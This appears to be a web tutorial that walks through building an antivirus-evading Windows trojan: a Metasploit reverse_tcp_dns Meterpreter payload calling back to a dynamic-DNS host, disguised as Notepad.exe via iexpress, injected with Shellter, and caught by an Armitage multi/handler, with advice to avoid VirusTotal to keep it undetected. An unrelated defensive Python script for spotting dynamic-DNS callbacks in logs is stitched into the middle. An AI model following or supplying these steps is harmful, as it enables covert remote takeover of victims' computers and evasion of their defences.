Create an Untraceable Trojan Using a Domain Name

In this tutorial I am going to show you how to create an untraceable Meterpreter Trojan using a Domain name. I have taken a few guides/tutorials and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable File. Part 3 is using both in Shellter to create your Untraceable Trojan. Part 4 is setting up your Listener using Armitage.

Things & Software You Will Need:

  • Kali Linux (Linux Distro)
  • Windows (Microsoft)
  • A No IP account with a domain name
  • A forwarded port on your router
  • Shellter Software

Disclaimer: This and all the tutorials here at TechLinu.com are solely for educational purposes. We are not responsible for any data loss or damage caused. Use it at your own risk.

Part 1: Creating the DNS Payload

Using Kali Linux OS:

Open Metasploit on Kali Linux by typing msfconsole in a terminal.

Type use payload/windows/meterpreter/reverse_tcp_dns.

Type show options. This will show you that you need to set your lhost and lport.

Type set lhost (hostname you created, without http://).

Type set lport (port you have forwarded on your router set for the Kali machine).

Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.

Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw

Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).

Transfer the created payload to Windows. (Be aware that your AV might detect it in its current state.)
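From the defender's side, the hostname set as lhost in Part 1 has to be resolved by the target before the callback can connect, and that lookup shows up in resolver logs. The following added example (not part of the original tutorial) correlates DNS and flow logs to flag a client that resolves a dynamic-DNS name and then connects to the answered address; the log formats, the suffix list and all sample lines are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumption: a short, illustrative list of dynamic-DNS suffixes; replace it
# with the full provider list your organisation tracks.
DDNS_SUFFIXES = ("ddns.net", "hopto.org", "zapto.org", "sytes.net", "no-ip.org")

# Constructed sample data (not real traffic). Both formats are assumptions:
#   DNS : "<ISO time> <client ip> <qname> <answer ip>"
#   flow: "<ISO time> <src ip> <dst ip> <dst port>"
DNS_LOG = """\
2024-05-01T09:00:01 10.0.0.21 updates.example.com 192.0.2.10
2024-05-01T09:02:10 10.0.0.37 host1.ddns.net 203.0.113.50
2024-05-01T09:05:00 10.0.0.44 cam.hopto.org 198.51.100.7
""".splitlines()
FLOW_LOG = """\
2024-05-01T09:00:02 10.0.0.21 192.0.2.10 443
2024-05-01T09:02:11 10.0.0.37 203.0.113.50 8443
2024-05-01T09:40:00 10.0.0.44 198.51.100.7 8080
""".splitlines()


def is_ddns(qname):
    """True if qname is, or is a subdomain of, a tracked dynamic-DNS suffix."""
    name = qname.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in DDNS_SUFFIXES)


def find_ddns_callbacks(dns_lines, flow_lines, window=timedelta(seconds=60)):
    """Return (client, qname, dst_ip, dst_port) for each outbound flow that
    follows a dynamic-DNS lookup by the same client to the answered IP."""
    lookups = []
    for line in dns_lines:
        ts, client, qname, answer = line.split()
        if is_ddns(qname):
            lookups.append((datetime.fromisoformat(ts), client, qname, answer))
    hits = []
    for line in flow_lines:
        ts, src, dst, port = line.split()
        when = datetime.fromisoformat(ts)
        for seen, client, qname, answer in lookups:
            if src == client and dst == answer and timedelta(0) <= when - seen <= window:
                hits.append((client, qname, dst, int(port)))
    return hits


if __name__ == "__main__":
    for hit in find_ddns_callbacks(DNS_LOG, FLOW_LOG):
        print(hit)
```

The 10.0.0.44 lookup is not reported because its connection falls outside the 60-second window; widen `window` if resolver caching on your network makes lookups and connections drift apart.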

Part 2: Creating the Executable File in Windows

Choose the option that applies to you. (This is important, as Shellter does not work with 64-bit executables.)

  • 32-bit Windows – Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
  • 64-bit Windows – Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)

Choose Create new Self Extraction Directive File and click next.

Click next on the Package Purpose page.

Type the title of the package. (This can be anything you want.) For example: Notepad.exe

No Prompt, click next.

Do not display a license. Click next.

Click Add and choose any file on your computer. I chose Notepad.exe in the C:\Windows\System32 folder. Click Next.

Click the drop arrow and choose the file name you chose on the last screen. Click Next.

Choose Hidden and then click next.

No Message. Click Next

Click Browse and type a name for your malware file and a destination target. Check the Hide File Extracting Progress Animation from user. Click Next.

Select No restart and then click next.

You can then either choose to save the self extraction directive or don’t save. Click Next.

Click Next again on the create Package. Then click Finish.

Part 3: Using Both Created Files in Shellter to Create Your Trojan

Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.

  • Type A for Auto.
  • Type N for No.

Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do its thing for 30 seconds to a minute.

When asked to choose payload, type C for custom.

Type the location of your created payload in Part 1 and hit enter.

Type N for No reflective DLL loader.

Hit enter and let Shellter finish doing its thing. If it says Injection Verified! you should have a working undetectable Trojan.

Hit enter to exit Shellter.

Part 4: Set Up Your Listener

You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.

Switch back to Kali Linux.

Open Terminal and type msfupdate

Once it’s done type apt-get install armitage.

Type msfdb init

Open Armitage

Click Connect

Click Yes

Once Armitage opens type: use exploit/multi/handler

Type set lhost 0.0.0.0

Type set lport (your port you forwarded in your router)

Type set payload windows/meterpreter/reverse_tcp_dns

Type set exitonsession false

(Optional.) Type set autorunscript migrate -f

(Optional.) Type set prependmigrate True

Type exploit -j

(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)

Now you should be able to run your undetectable Trojan and get a Meterpreter session.

DO NOT Upload your created Executable to online sites such as Virus Total.
